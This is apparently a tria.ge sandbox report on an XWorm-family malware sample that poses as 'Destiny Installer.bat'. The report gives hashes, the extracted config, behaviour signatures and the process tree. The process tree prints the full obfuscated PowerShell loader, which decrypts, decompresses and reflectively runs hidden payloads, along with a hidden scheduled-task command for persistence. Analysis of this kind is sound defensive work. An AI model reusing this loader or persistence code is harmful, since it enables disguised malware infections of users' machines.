Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
119s -
max time network
95s -
platform
windows11-21h2_x64 -
resource
win11-20250217-en -
resource tags
arch:x64arch:x86image:win11-20250217-enlocale:en-usos:windows11-21h2-x64system -
submitted
01/03/2025, 17:45
Static task
static1
General
-
Target
destiny installer/Destiny Installer.bat
-
Size
327KB
-
MD5
2ae432966df2247f6019b7f4f92133b5
-
SHA1
ccffdee15b76f1239ff1552b0b5992b04753096b
-
SHA256
b7993ee9e7a074d2fd1a39756bf13e276722043be49e932a5c1540cecd7f7a61
-
SHA512
83b254cbfbaedca5904d761466d638de7b758986f572679cf80c0cafbd20ffd46dc4aa97c04ace4d650ea073a25459cf2d6ef32275e2ca1ce11e0d22fed1a569
-
SSDEEP
6144:IGuBeLEz1JHrfxWyiFwx5mnJ7x2AxQ4SEqxqH284++gGZzmdH2lXVKwT5gJy9pHC:ItBe6bHVWy7ATxQ49H284+dGZzUH21wd
Malware Config
Extracted
xworm
5.0
127.0.0.1:7000
3axbgW4A6QodtIl7
-
Install_directory
%ProgramData%
-
install_file
Destiny Installer.exe
Signatures
-
Detect Xworm Payload 1 IoCs
resource yara_rule behavioral1/memory/3704-48-0x0000022E272D0000-0x0000022E272EA000-memory.dmp family_xworm -
Xworm family
-
Blocklisted process makes network request 1 IoCs
flow pid Process 2 3704 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs
Run Powershell and hide display window.
pid Process 956 powershell.exe 3704 powershell.exe 4228 powershell.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 1 ip-api.com -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3449935180-2903586757-2462874082-1000_Classes\Local Settings powershell.exe -
Suspicious behavior: EnumeratesProcesses 6 IoCs
pid Process 4228 powershell.exe 4228 powershell.exe 956 powershell.exe 956 powershell.exe 3704 powershell.exe 3704 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 4228 powershell.exe Token: SeDebugPrivilege 956 powershell.exe Token: SeIncreaseQuotaPrivilege 956 powershell.exe Token: SeSecurityPrivilege 956 powershell.exe Token: SeTakeOwnershipPrivilege 956 powershell.exe Token: SeLoadDriverPrivilege 956 powershell.exe Token: SeSystemProfilePrivilege 956 powershell.exe Token: SeSystemtimePrivilege 956 powershell.exe Token: SeProfSingleProcessPrivilege 956 powershell.exe Token: SeIncBasePriorityPrivilege 956 powershell.exe Token: SeCreatePagefilePrivilege 956 powershell.exe Token: SeBackupPrivilege 956 powershell.exe Token: SeRestorePrivilege 956 powershell.exe Token: SeShutdownPrivilege 956 powershell.exe Token: SeDebugPrivilege 956 powershell.exe Token: SeSystemEnvironmentPrivilege 956 powershell.exe Token: SeRemoteShutdownPrivilege 956 powershell.exe Token: SeUndockPrivilege 956 powershell.exe Token: SeManageVolumePrivilege 956 powershell.exe Token: 33 956 powershell.exe Token: 34 956 powershell.exe Token: 35 956 powershell.exe Token: 36 956 powershell.exe Token: SeIncreaseQuotaPrivilege 956 powershell.exe Token: SeSecurityPrivilege 956 powershell.exe Token: SeTakeOwnershipPrivilege 956 powershell.exe Token: SeLoadDriverPrivilege 956 powershell.exe Token: SeSystemProfilePrivilege 956 powershell.exe Token: SeSystemtimePrivilege 956 powershell.exe Token: SeProfSingleProcessPrivilege 956 powershell.exe Token: SeIncBasePriorityPrivilege 956 powershell.exe Token: SeCreatePagefilePrivilege 956 powershell.exe Token: SeBackupPrivilege 956 powershell.exe Token: SeRestorePrivilege 956 powershell.exe Token: SeShutdownPrivilege 956 powershell.exe Token: SeDebugPrivilege 956 powershell.exe Token: SeSystemEnvironmentPrivilege 956 powershell.exe Token: SeRemoteShutdownPrivilege 956 powershell.exe Token: SeUndockPrivilege 956 powershell.exe Token: SeManageVolumePrivilege 956 powershell.exe Token: 33 956 powershell.exe Token: 34 956 powershell.exe Token: 35 956 powershell.exe Token: 36 956 powershell.exe Token: SeIncreaseQuotaPrivilege 956 powershell.exe Token: SeSecurityPrivilege 956 powershell.exe Token: SeTakeOwnershipPrivilege 956 powershell.exe Token: SeLoadDriverPrivilege 956 powershell.exe Token: SeSystemProfilePrivilege 956 powershell.exe Token: SeSystemtimePrivilege 956 powershell.exe Token: SeProfSingleProcessPrivilege 956 powershell.exe Token: SeIncBasePriorityPrivilege 956 powershell.exe Token: SeCreatePagefilePrivilege 956 powershell.exe Token: SeBackupPrivilege 956 powershell.exe Token: SeRestorePrivilege 956 powershell.exe Token: SeShutdownPrivilege 956 powershell.exe Token: SeDebugPrivilege 956 powershell.exe Token: SeSystemEnvironmentPrivilege 956 powershell.exe Token: SeRemoteShutdownPrivilege 956 powershell.exe Token: SeUndockPrivilege 956 powershell.exe Token: SeManageVolumePrivilege 956 powershell.exe Token: 33 956 powershell.exe Token: 34 956 powershell.exe Token: 35 956 powershell.exe -
Suspicious use of WriteProcessMemory 10 IoCs
description pid Process procid_target PID 2180 wrote to memory of 4228 2180 cmd.exe 78 PID 2180 wrote to memory of 4228 2180 cmd.exe 78 PID 4228 wrote to memory of 956 4228 powershell.exe 79 PID 4228 wrote to memory of 956 4228 powershell.exe 79 PID 4228 wrote to memory of 3004 4228 powershell.exe 82 PID 4228 wrote to memory of 3004 4228 powershell.exe 82 PID 3004 wrote to memory of 5100 3004 WScript.exe 83 PID 3004 wrote to memory of 5100 3004 WScript.exe 83 PID 5100 wrote to memory of 3704 5100 cmd.exe 85 PID 5100 wrote to memory of 3704 5100 cmd.exe 85
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\destiny installer\Destiny Installer.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:2180 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('JbpOv5Dd20QS+jAUaxWzfQ8Ue7OWB/lZpkmUiDzmjXc='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('+oOxt502v2luXR//6oDybA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $OrPUq=New-Object System.IO.MemoryStream(,$param_var); $PVXiG=New-Object System.IO.MemoryStream; $QksXF=New-Object System.IO.Compression.GZipStream($OrPUq, [IO.Compression.CompressionMode]::Decompress); $QksXF.CopyTo($PVXiG); $QksXF.Dispose(); $OrPUq.Dispose(); $PVXiG.Dispose(); $PVXiG.ToArray();}function execute_function($param_var,$param2_var){ $dhbrq=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $UQwuM=$dhbrq.EntryPoint; $UQwuM.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\destiny installer\Destiny Installer.bat';$AwDLs=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\destiny installer\Destiny Installer.bat').Split([Environment]::NewLine);foreach ($zLvFY in $AwDLs) { if ($zLvFY.StartsWith(':: ')) { $OBKgh=$zLvFY.Substring(3); break; }}$payloads_var=[string[]]$OBKgh.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));2⤵
- Command and Scripting Interpreter: PowerShell
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4228 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_351_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_351.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:956
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_351.vbs"3⤵
- Suspicious use of WriteProcessMemory
PID:3004 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_351.bat" "4⤵
- Suspicious use of WriteProcessMemory
PID:5100 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('JbpOv5Dd20QS+jAUaxWzfQ8Ue7OWB/lZpkmUiDzmjXc='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('+oOxt502v2luXR//6oDybA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $OrPUq=New-Object System.IO.MemoryStream(,$param_var); $PVXiG=New-Object System.IO.MemoryStream; $QksXF=New-Object System.IO.Compression.GZipStream($OrPUq, [IO.Compression.CompressionMode]::Decompress); $QksXF.CopyTo($PVXiG); $QksXF.Dispose(); $OrPUq.Dispose(); $PVXiG.Dispose(); $PVXiG.ToArray();}function execute_function($param_var,$param2_var){ $dhbrq=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $UQwuM=$dhbrq.EntryPoint; $UQwuM.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Roaming\startup_str_351.bat';$AwDLs=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Roaming\startup_str_351.bat').Split([Environment]::NewLine);foreach ($zLvFY in $AwDLs) { if ($zLvFY.StartsWith(':: ')) { $OBKgh=$zLvFY.Substring(3); break; }}$payloads_var=[string[]]$OBKgh.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));5⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:3704
-
-
-
-
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵PID:2040
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3KB
MD5df472dcddb36aa24247f8c8d8a517bd7
SHA16f54967355e507294cbc86662a6fbeedac9d7030
SHA256e4e0fbc974e6946d20ddfaf22c543fccc4662d28e30530ec710fec149958f9b6
SHA51206383259258a8c32f676ddaf7ea1fec3de7318ff1338f022e03c6b33458f2ce708e073ceb1aa26e3cf37f82dac37c8163b8ebd2de56b8530dffe177845c7adca
-
Filesize
1KB
MD5eb15ee5741b379245ca8549cb0d4ecf8
SHA13555273945abda3402674aea7a4bff65eb71a783
SHA256b605e00d6056ae84f253f22adf37d6561a86d230c26fba8bfb39943c66e27636
SHA5121f71fe8b6027feb07050715107039da89bb3ed5d32da9dca0138c393e0d705ebf3533bcccec49e70a44e0ec0c07809aef6befa097ad4ced18ca17ae98e6df0e4
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
327KB
MD52ae432966df2247f6019b7f4f92133b5
SHA1ccffdee15b76f1239ff1552b0b5992b04753096b
SHA256b7993ee9e7a074d2fd1a39756bf13e276722043be49e932a5c1540cecd7f7a61
SHA51283b254cbfbaedca5904d761466d638de7b758986f572679cf80c0cafbd20ffd46dc4aa97c04ace4d650ea073a25459cf2d6ef32275e2ca1ce11e0d22fed1a569
-
Filesize
115B
MD59070a213c9b7d9f2419fab0d1eebea37
SHA1e9ae5433641c69367803d21371721b04ac8f9400
SHA25665d8bcb8887ab07e50ae110cb259e92aed2036e855b4b8d6e44f42bd716f1aab
SHA51238f8749e8a6cb29145a8be9c28c091c9e7318ce24a5ea2567c02bdd8997bfc2d73aa52dac825c867669c70e218df950f82a66c4742ba976c3ce2b349446a6314